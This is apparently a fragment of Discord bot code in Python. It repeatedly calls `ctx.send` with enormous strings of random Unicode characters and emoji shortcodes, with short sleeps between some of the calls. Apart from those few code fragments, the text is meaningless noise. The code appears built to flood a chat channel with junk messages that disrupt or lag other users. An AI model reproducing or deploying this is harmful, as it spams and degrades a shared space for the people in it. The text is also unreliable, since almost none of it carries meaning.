ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤
͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") time.sleep(3) await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ
஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_s
unny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е